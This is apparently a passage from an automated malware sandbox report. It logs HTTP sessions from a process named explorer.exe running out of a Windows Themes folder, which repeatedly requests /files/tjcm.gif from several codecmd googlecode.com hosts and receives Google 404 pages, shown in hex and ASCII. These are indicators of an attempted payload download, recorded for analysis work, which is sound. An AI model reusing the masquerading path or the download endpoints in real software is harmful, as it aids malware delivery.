                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64
                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
                                                                                                                                                                                Jul 16, 2022 23:58:17.704376936 CEST2706INData Raw: 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65
                                                                                                                                                                                Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                3192.168.2.549805142.250.102.8280C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Jul 16, 2022 23:57:26.842829943 CEST1781OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Host: codecmd03.googlecode.com
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Jul 16, 2022 23:57:26.869627953 CEST1782INHTTP/1.1 404 Not Found
                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                Referrer-Policy: no-referrer
                                                                                                                                                                                Content-Length: 1575
                                                                                                                                                                                Date: Sat, 16 Jul 2022 21:57:26 GMT
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64
                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
                                                                                                                                                                                Jul 16, 2022 23:57:26.869663000 CEST1782INData Raw: 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65
                                                                                                                                                                                Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                30192.168.2.549885142.250.102.8280C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Jul 16, 2022 23:58:18.986483097 CEST2720OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Host: codecmd01.googlecode.com
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Jul 16, 2022 23:58:19.013293982 CEST2722INHTTP/1.1 404 Not Found
                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                Referrer-Policy: no-referrer
                                                                                                                                                                                Content-Length: 1575
                                                                                                                                                                                Date: Sat, 16 Jul 2022 21:58:18 GMT
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 30 25 20 30 25 2f 31 30 30 25 20 31 30 30 25 3b 2d 6d 6f 7a 2d 62 6f 72 64 65 72 2d 69 6d 61 67 65 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 30 7d 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64
                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) 0}}@media only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/brand
                                                                                                                                                                                Jul 16, 2022 23:58:19.013350010 CEST2722INData Raw: 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65
                                                                                                                                                                                Data Ascii: ing/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:150px} </style> <a href=//www.google.com/><span id=logo aria-label=Google></span></a> <p><b>404.</


                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                                                31192.168.2.549886142.250.102.8280C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                                                Jul 16, 2022 23:58:20.281632900 CEST2723OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                                                                                                Accept: */*
                                                                                                                                                                                Accept-Encoding: gzip, deflate
                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                                Host: codecmd02.googlecode.com
                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                Jul 16, 2022 23:58:20.308252096 CEST2724INHTTP/1.1 404 Not Found
                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                Referrer-Policy: no-referrer
                                                                                                                                                                                Content-Length: 1575
                                                                                                                                                                                Date: Sat, 16 Jul 2022 21:58:20 GMT
                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67 3a 33 30 70 78 20 30 20 31 35 70 78 7d 2a 20 3e 20 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 65 72 72 6f 72 73 2f 72 6f 62 6f 74 2e 70 6e 67 29 20 31 30 30 25 20 35 70 78 20 6e 6f 2d 72 65 70 65 61 74 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 32 30 35 70 78 7d 70 7b 6d 61 72 67 69 6e 3a 31 31 70 78 20 30 20 32 32 70 78 3b 6f 76 65 72 66 6c 6f 77 3a 68 69 64 64 65 6e 7d 69 6e 73 7b 63 6f 6c 6f 72 3a 23 37 37 37 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 61 20 69 6d 67 7b 62 6f 72 64 65 72 3a 30 7d 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 37 37 32 70 78 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 6e 6f 6e 65 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 3b 6d 61 78 2d 77 69 64 74 68 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 30 7d 7d 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 31 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 6e 67 29 20 6e 6f 2d 72 65 70 65 61 74 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 35 70 78 7d 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 72 65 73 6f 6c 75 74 69 6f 6e 3a 31 39 32 64 70 69 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 62 72 61 6e 64 69 6e 67 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 2f 32 78 2f 67 6f 6f 67 6c 65 6c 6f 67 6f 5f 63 6f 6c 6f 72 5f 31 35 30 78 35 34 64 70 2e 70 